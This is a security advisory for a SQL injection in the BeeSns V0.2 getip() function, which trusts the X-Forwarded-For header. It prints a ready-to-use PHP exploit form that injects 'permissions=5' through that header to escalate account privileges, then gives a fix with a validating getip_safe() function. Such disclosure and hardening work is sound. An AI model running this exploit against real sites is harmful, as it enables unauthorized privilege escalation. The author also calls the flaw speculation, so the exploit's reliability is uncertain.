Release date: 2011-01-27
Author: Zi Yi
Affected Version: BeeSns V0.2
Official Address: http://www.beesns.com/
Vulnerability Description: The client IP address is taken from user-controlled headers and is never filtered, so a user can submit a crafted value (SQL injection through the IP field) to raise their own permissions.
This microblog system has a nice style, and I personally like it. Checking the code turned up some problems, so let's look at the code directly.
// obtain the client IP address
function getip() {
    if (isset($_SERVER)) {
        if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
            $realip = $_SERVER['HTTP_X_FORWARDED_FOR'];
        } elseif (isset($_SERVER['HTTP_CLIENT_IP'])) {
            $realip = $_SERVER['HTTP_CLIENT_IP'];
        } else {
            $realip = $_SERVER['REMOTE_ADDR'];
        }
    } else {
        if (getenv("HTTP_X_FORWARDED_FOR")) {
            $realip = getenv("HTTP_X_FORWARDED_FOR");
        } elseif (getenv("HTTP_CLIENT_IP")) {
            $realip = getenv("HTTP_CLIENT_IP");
        } else {
            $realip = getenv("REMOTE_ADDR");
        }
    }
    $iphide = explode(".", $realip);

    // Splitting on "." and gluing the first four pieces back together changes nothing:
    // everything after the third dot (including any injected tail) is kept in $iphide[3].
    $realip = "$iphide[0].$iphide[1].$iphide[2].$iphide[3]"; //! I don't understand what the author wrote. The IP address is not filtered, and that is where the vulnerability comes from.
    return $realip;
}
This vulnerability is pure speculation on my part (YY). --!
EXP:
<?php
print_r('
+---------------------------------------------------------------------------+<br>
BeeSns v0.2 getip() Remote SQL Injection Exploit<br>
site: www.beesns.com<br>
by Zi Yi<br>
Blog: http://www.zyday.com<br>

+---------------------------------------------------------------------------+<br>');

if (empty($_POST['submit'])) {
} else {
    error_reporting(7);
    ini_set('max_execution_time', 0);
    $host     = $_POST['host'];
    $path     = $_POST['path'];
    $username = $_POST['username'];
    $password = $_POST['password'];
    send();
}

function send()
{
    global $host, $path, $username, $password;

    $cmd    = "uId=" . $username . "&uPw=" . $password;
    // the injected value travels in the X-Forwarded-For header, which getip() trusts as-is
    $getinj = "1.1.1.1, permissions=5 where uid=$username #";
    $data  = "POST " . $path . "post.php?act=userLogin HTTP/1.1\r\n";
    $data .= "Accept: */*\r\n";
    $data .= "Accept-Language: zh-cn\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $data .= "Host: $host\r\n";
    $data .= "Content-Length: " . strlen($cmd) . "\r\n";
    $data .= "Connection: Close\r\n";
    $data .= "X-Forwarded-For: $getinj\r\n\r\n";
    $data .= $cmd;

    $fp = fsockopen($host, 80);
    fputs($fp, $data);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    if (preg_match('#(.*)charset=UTF-8(.*)1(.*)1(.*)0(.*)#Uis', $resp)) {
        echo "<br><font color=green>Permissions upgraded successfully!</font>";
    } else {
        echo "<font color=red>Failed!</font>";
    }

}
?>
<form action="" method="POST">
Target address: <input type="input" name="host" value="www.zyday.com"> * do not add http://<br>
Second-level directory: <input type="input" name="path" value="/"> * if the site is not in a second-level directory, keep the default value.<br>
User name: <input type="input" name="username"> * a user name registered on the target site. <font color=red>We recommend testing with a throwaway account.</font><br>
Password: <input type="input" name="password"><br>
<input type="submit" name="submit" value="Privilege Escalation"><br>
</form>
Fix: filter the IP address. Validate that the value really is an IP address before it is stored or used in a query, and do not trust X-Forwarded-For / Client-IP headers unless the request came from a known proxy.
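As an added example (not BeeSns code), here is a hardened replacement for getip(): it only consults proxy headers when the direct peer is in an assumed $trustedProxies list, walks the X-Forwarded-For chain from the right, and keeps only entries that pass filter_var(). The request array below is constructed to carry the same kind of value the advisory describes.

```php
<?php
// Added example, not part of BeeSns: a hardened getip().
// $trustedProxies is an assumed configuration value listing reverse-proxy addresses.
function getip_safe(array $server, array $trustedProxies = [])
{
    $remote = isset($server['REMOTE_ADDR']) ? $server['REMOTE_ADDR'] : '';
    if (filter_var($remote, FILTER_VALIDATE_IP) === false) {
        return '0.0.0.0'; // no usable peer address at all
    }
    // Forwarding headers are client-controlled text; only believe them when the
    // direct peer is a proxy we operate.
    if (!in_array($remote, $trustedProxies, true)) {
        return $remote;
    }
    foreach (['HTTP_X_FORWARDED_FOR', 'HTTP_CLIENT_IP'] as $hdr) {
        if (empty($server[$hdr])) {
            continue;
        }
        // X-Forwarded-For is a comma-separated chain; the trusted proxy appends the
        // address it saw last, so walk from the right and take the first valid IP.
        $chain = array_map('trim', explode(',', $server[$hdr]));
        foreach (array_reverse($chain) as $candidate) {
            if (filter_var($candidate, FILTER_VALIDATE_IP) !== false) {
                return $candidate;
            }
        }
    }
    return $remote; // nothing in the headers was a real IP address
}

// Constructed request: the client sends an X-Forwarded-For with a non-IP tail.
$server = [
    'REMOTE_ADDR'          => '10.0.0.2',
    'HTTP_X_FORWARDED_FOR' => '1.1.1.1, permissions=5 where uid=7 #',
];
var_dump(getip_safe($server));               // "10.0.0.2": peer is not a trusted proxy, header ignored
var_dump(getip_safe($server, ['10.0.0.2'])); // "1.1.1.1": the non-IP tail is rejected

// Even a validated address must not be concatenated into SQL; bind it instead.
// (Assumed PDO usage, not BeeSns code.)
// $stmt = $pdo->prepare('UPDATE users SET lastip = ? WHERE uid = ?');
// $stmt->execute([getip_safe($_SERVER, $trustedProxies), $uid]);
```

Validation limits what can reach the query, but the parameter binding shown in the trailing comment is what actually removes the injection.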